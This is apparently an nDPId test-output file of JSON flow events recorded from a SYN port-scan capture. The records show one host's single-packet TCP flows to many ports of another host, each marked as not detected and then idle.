+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
